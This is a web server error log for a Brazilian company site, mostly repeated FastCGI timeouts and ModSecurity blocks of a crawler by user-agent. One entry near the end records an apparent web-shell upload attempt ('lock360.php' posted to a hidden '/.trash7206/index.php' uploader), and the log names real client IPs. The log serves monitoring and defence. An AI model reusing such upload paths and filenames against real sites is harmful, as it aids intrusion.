[Tue Mar 17 02:09:18.307259 2026] [:error] [pid 11469:tid 140411741927168] [client 74.7.228.16:45164] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjh_pDEJR9VXonE_-0d1gAAAQA"]
[Tue Mar 17 02:09:33.129790 2026] [proxy_fcgi:error] [pid 2304:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:53644] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:09:54.174906 2026] [proxy_fcgi:error] [pid 2305:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:54006] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:10:15.088819 2026] [proxy_fcgi:error] [pid 2304:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:54138] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:10:36.115085 2026] [proxy_fcgi:error] [pid 11469:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:54236] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:11:01.133826 2026] [proxy_fcgi:error] [pid 4740:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:54494] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:11:23.129937 2026] [proxy_fcgi:error] [pid 2305:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:54606] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:11:44.137801 2026] [proxy_fcgi:error] [pid 11293:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:54742] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:12:05.061844 2026] [proxy_fcgi:error] [pid 11469:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:54962] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:12:26.133989 2026] [proxy_fcgi:error] [pid 2304:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:55068] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:12:47.138679 2026] [proxy_fcgi:error] [pid 2305:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:55230] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:13:08.133807 2026] [proxy_fcgi:error] [pid 2304:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:55370] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:13:29.986693 2026] [proxy_fcgi:error] [pid 11469:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:55466] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:13:51.157868 2026] [proxy_fcgi:error] [pid 4740:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:55646] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:13:58.318402 2026] [:error] [pid 4740:tid 140411548894976] [client 74.7.244.31:41540] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjjFgfYLcKp6Sb5AeIMJAAAAFc"]
[Tue Mar 17 02:14:12.129871 2026] [proxy_fcgi:error] [pid 2473:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:55746] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:14:34.133799 2026] [proxy_fcgi:error] [pid 11469:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:55928] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:14:55.118772 2026] [proxy_fcgi:error] [pid 2473:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:56132] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:15:16.154547 2026] [proxy_fcgi:error] [pid 2305:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:56238] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:15:37.118171 2026] [proxy_fcgi:error] [pid 4740:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:56350] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:15:39.232468 2026] [:error] [pid 11293:tid 140411641214720] [client 74.7.228.16:36092] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjje9CmCSWTlPouqoqf1AAAAMw"]
[Tue Mar 17 02:15:58.134523 2026] [proxy_fcgi:error] [pid 11293:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:56610] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:16:23.129929 2026] [proxy_fcgi:error] [pid 2325:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:56824] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:16:44.139850 2026] [proxy_fcgi:error] [pid 2304:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:56916] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:17:05.070571 2026] [proxy_fcgi:error] [pid 2325:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:57076] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:17:26.125818 2026] [proxy_fcgi:error] [pid 2325:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:57234] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:17:28.349840 2026] [proxy_fcgi:error] [pid 4740:tid 140411632822016] [client 80.82.121.21:56190] AH01071: Got error 'Primary script unknown', referer: https://bandeirantesbombas.com.br/wp-login.php
[Tue Mar 17 02:17:47.125928 2026] [proxy_fcgi:error] [pid 2305:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:57460] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:18:08.115726 2026] [proxy_fcgi:error] [pid 2473:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:57616] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:18:30.129787 2026] [proxy_fcgi:error] [pid 2304:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:57772] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:18:51.133993 2026] [proxy_fcgi:error] [pid 2473:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:57952] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:19:12.145961 2026] [proxy_fcgi:error] [pid 2473:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:58168] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:19:33.142578 2026] [proxy_fcgi:error] [pid 2305:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:58434] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:19:56.045834 2026] [proxy_fcgi:error] [pid 4740:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:58728] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:20:17.149897 2026] [proxy_fcgi:error] [pid 11469:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:58856] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:20:38.105848 2026] [proxy_fcgi:error] [pid 2305:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:59032] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:20:52.290123 2026] [:error] [pid 2325:tid 140411599251200] [client 74.7.228.16:33880] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjktO82sZHvlq4xgHqX8QAAApE"]
[Tue Mar 17 02:20:59.140509 2026] [proxy_fcgi:error] [pid 2325:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:59338] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:21:20.130122 2026] [proxy_fcgi:error] [pid 2325:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:59574] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:21:45.150723 2026] [proxy_fcgi:error] [pid 11293:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:59854] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:22:07.196832 2026] [proxy_fcgi:error] [pid 2325:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:60068] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:22:29.146054 2026] [proxy_fcgi:error] [pid 2305:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:60282] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:22:51.147397 2026] [proxy_fcgi:error] [pid 11469:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:60486] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:23:13.618950 2026] [proxy_fcgi:error] [pid 2325:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:60722] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:23:35.038307 2026] [proxy_fcgi:error] [pid 2325:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:32818] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:23:56.150133 2026] [proxy_fcgi:error] [pid 2473:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:33044] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:24:17.177796 2026] [proxy_fcgi:error] [pid 11469:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:33388] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:24:20.403575 2026] [:error] [pid 11469:tid 140411666392832] [client 74.7.244.31:40464] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjlhJDEJR9VXonE_-0fjwAAAQk"]
[Tue Mar 17 02:24:38.133893 2026] [proxy_fcgi:error] [pid 11293:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:33482] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:24:59.125101 2026] [proxy_fcgi:error] [pid 2304:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:33612] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:25:20.150879 2026] [proxy_fcgi:error] [pid 2325:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:33732] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:25:41.149783 2026] [proxy_fcgi:error] [pid 4740:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:33856] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:26:02.140875 2026] [proxy_fcgi:error] [pid 4740:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:34044] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:26:17.021511 2026] [:error] [pid 4740:tid 140411540502272] [client 74.7.228.16:45908] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjl-QfYLcKp6Sb5AeINWgAAAFg"]
[Tue Mar 17 02:26:23.067189 2026] [proxy_fcgi:error] [pid 2304:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:34228] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:26:44.137828 2026] [proxy_fcgi:error] [pid 2325:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:34362] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:27:07.103378 2026] [proxy_fcgi:error] [pid 11293:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:34594] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:27:28.155881 2026] [proxy_fcgi:error] [pid 2473:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:34848] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:27:51.095755 2026] [proxy_fcgi:error] [pid 11293:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:35022] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:28:12.159193 2026] [proxy_fcgi:error] [pid 2473:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:35190] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:28:34.129828 2026] [proxy_fcgi:error] [pid 2325:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:35378] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:28:55.189859 2026] [proxy_fcgi:error] [pid 2473:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:35562] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:29:17.152344 2026] [proxy_fcgi:error] [pid 2325:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:35884] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:29:27.515485 2026] [:error] [pid 11469:tid 140411599251200] [client 74.7.244.31:38130] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjmt5DEJR9VXonE_-0f3gAAARE"]
[Tue Mar 17 02:29:39.129820 2026] [proxy_fcgi:error] [pid 2325:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:36000] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:30:00.150718 2026] [proxy_fcgi:error] [pid 11469:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:36128] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:30:21.169813 2026] [proxy_fcgi:error] [pid 2325:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:36378] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:30:42.146660 2026] [proxy_fcgi:error] [pid 2325:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:36598] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:31:03.145781 2026] [proxy_fcgi:error] [pid 2325:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:36844] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:31:23.598343 2026] [:error] [pid 2325:tid 140411582465792] [client 74.7.228.16:51826] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjnK-82sZHvlq4xgHqYowAAApM"]
[Tue Mar 17 02:31:24.113832 2026] [proxy_fcgi:error] [pid 2305:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:37052] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:31:46.146494 2026] [proxy_fcgi:error] [pid 11469:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:37266] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:32:07.133881 2026] [proxy_fcgi:error] [pid 4740:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:37458] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:32:29.149102 2026] [proxy_fcgi:error] [pid 11293:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:37712] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:32:50.153823 2026] [proxy_fcgi:error] [pid 2325:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:37930] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:33:11.137885 2026] [proxy_fcgi:error] [pid 2305:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:38138] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:33:32.165888 2026] [proxy_fcgi:error] [pid 4740:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:38302] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:33:54.141996 2026] [proxy_fcgi:error] [pid 11469:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:38472] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:34:16.141782 2026] [proxy_fcgi:error] [pid 11469:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:38704] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:34:38.117944 2026] [proxy_fcgi:error] [pid 2325:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:39000] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:34:57.229431 2026] [:error] [pid 4740:tid 140411716749056] [client 74.7.244.31:55240] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjoAQfYLcKp6Sb5AeIOXQAAAEM"]
[Tue Mar 17 02:34:59.089175 2026] [proxy_fcgi:error] [pid 2304:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:39272] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:35:20.141839 2026] [proxy_fcgi:error] [pid 2305:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:39552] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:35:42.132822 2026] [proxy_fcgi:error] [pid 2325:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:39834] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:36:04.125794 2026] [proxy_fcgi:error] [pid 2305:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:40044] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:36:25.033898 2026] [proxy_fcgi:error] [pid 4740:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:40316] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:36:46.129045 2026] [proxy_fcgi:error] [pid 11293:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:40578] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:37:07.113885 2026] [proxy_fcgi:error] [pid 2325:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:40772] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:37:28.149826 2026] [proxy_fcgi:error] [pid 2305:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:40868] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:37:50.089973 2026] [proxy_fcgi:error] [pid 2305:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:41032] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:38:11.116214 2026] [proxy_fcgi:error] [pid 2325:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:41212] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:38:32.085859 2026] [proxy_fcgi:error] [pid 2473:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:41350] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:38:53.141936 2026] [proxy_fcgi:error] [pid 4740:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:41448] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:39:14.163755 2026] [proxy_fcgi:error] [pid 4740:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:41692] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:39:35.137799 2026] [proxy_fcgi:error] [pid 2325:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:41940] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:39:56.133115 2026] [proxy_fcgi:error] [pid 4740:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:42164] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:40:12.971021 2026] [:error] [pid 11469:tid 140411557287680] [client 74.7.244.31:58212] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjpPJDEJR9VXonE_-0g9gAAARY"]
[Tue Mar 17 02:40:17.116005 2026] [proxy_fcgi:error] [pid 2473:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:42314] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:40:38.130007 2026] [proxy_fcgi:error] [pid 11469:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:42502] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:41:00.053568 2026] [proxy_fcgi:error] [pid 2473:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:42598] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:41:21.109854 2026] [proxy_fcgi:error] [pid 11469:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42742] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:41:42.137803 2026] [proxy_fcgi:error] [pid 11469:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:42948] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:42:03.134206 2026] [proxy_fcgi:error] [pid 2304:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:43108] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:42:24.137789 2026] [proxy_fcgi:error] [pid 4740:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:43260] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:42:45.211127 2026] [proxy_fcgi:error] [pid 11293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:43422] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:43:07.129825 2026] [proxy_fcgi:error] [pid 2304:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:43620] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:43:28.061836 2026] [proxy_fcgi:error] [pid 11469:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:43844] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:43:49.151987 2026] [proxy_fcgi:error] [pid 2304:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:44052] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:44:10.129805 2026] [proxy_fcgi:error] [pid 11469:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:44268] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:44:31.157832 2026] [proxy_fcgi:error] [pid 4740:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:44412] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:44:52.125799 2026] [proxy_fcgi:error] [pid 11293:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:44578] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:45:13.128499 2026] [proxy_fcgi:error] [pid 2473:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:44742] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:45:34.133788 2026] [proxy_fcgi:error] [pid 2473:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:44976] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:45:39.836503 2026] [:error] [pid 2325:tid 140411540502272] [client 74.7.244.31:57940] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjqg-82sZHvlq4xgHqZugAAApg"]
[Tue Mar 17 02:45:56.129828 2026] [proxy_fcgi:error] [pid 2305:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:45202] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:46:17.126208 2026] [proxy_fcgi:error] [pid 4740:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:45312] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:46:38.143048 2026] [proxy_fcgi:error] [pid 11469:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:45494] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:46:59.133788 2026] [proxy_fcgi:error] [pid 11469:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:45772] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:47:21.159752 2026] [proxy_fcgi:error] [pid 11469:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:46142] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:47:22.931614 2026] [:error] [pid 2325:tid 140411741927168] [client 74.7.228.16:57966] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjq6u82sZHvlq4xgHqZ2QAAAoA"]
[Tue Mar 17 02:47:42.045806 2026] [proxy_fcgi:error] [pid 2304:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:46402] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:48:03.129814 2026] [proxy_fcgi:error] [pid 11293:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:46568] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:48:25.453203 2026] [proxy_fcgi:error] [pid 11293:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:46746] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:48:47.133845 2026] [proxy_fcgi:error] [pid 2473:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:46976] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:49:08.134521 2026] [proxy_fcgi:error] [pid 4740:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:47192] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:49:29.060163 2026] [proxy_fcgi:error] [pid 2304:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:47386] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:49:50.158562 2026] [proxy_fcgi:error] [pid 2305:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:47676] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:50:11.145806 2026] [proxy_fcgi:error] [pid 4740:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:47922] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:50:17.054204 2026] [:error] [pid 4740:tid 140411540502272] [client 45.62.98.251:45878] [client 45.62.98.251] ModSecurity: Multipart parsing error: Multipart: Invalid Content-Disposition header (-11): form-data; name=berkas; filename=lock360.php; filename*=utf-8''lock360.php. [hostname "bandeirantesbombas.com.br"] [uri "/.trash7206/index.php"] [unique_id "abjrmAfYLcKp6Sb5AeIPSAAAAFg"]
[Tue Mar 17 02:50:33.129251 2026] [proxy_fcgi:error] [pid 11469:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:48142] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:50:51.550297 2026] [:error] [pid 2305:tid 140411666392832] [client 74.7.244.31:53068] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjruwQohV2v-7oj5HHS8QAAAYk"]
